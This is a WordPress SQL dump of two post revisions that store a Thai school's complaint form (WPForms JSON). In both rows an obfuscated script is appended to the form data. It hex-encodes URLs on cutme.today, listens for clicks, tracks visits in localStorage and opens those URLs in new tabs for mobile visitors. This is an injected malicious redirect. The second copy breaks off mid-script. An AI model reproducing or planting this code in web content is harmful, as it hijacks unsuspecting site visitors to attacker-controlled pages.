(489,1,'2024-08-02 11:50:19','2024-08-02 04:50:19','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e2d\\u0e1a\\u0e23\\u0e31\\u0e1a\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"486\",\"field_id\":7,\"settings\":{\"form_title\":\"\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New \\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>\\u00a0\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e23\\u0e49\\u0e2d\\u0e22\\u0e41\\u0e25\\u0e49\\u0e27<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','486-revision-v1','','','2024-08-02 11:50:19','2024-08-02 04:50:19','',486,'http://pakhaeng.ssk.in.th/?p=489',0,'revision','',0),
(490,1,'2024-08-02 11:50:56','2024-08-02 04:50:56','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e2d\\u0e1a\\u0e23\\u0e31\\u0e1a\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"486\",\"field_id\":7,\"settings\":{\"form_title\":\"\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"33010169@sisaketedu1.go.th\",\"subject\":\"New \\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>\\u00a0\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e23\\u0e49\\u0e2d\\u0e22\\u0e41\\u0e25\\u0e49\\u0e27<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 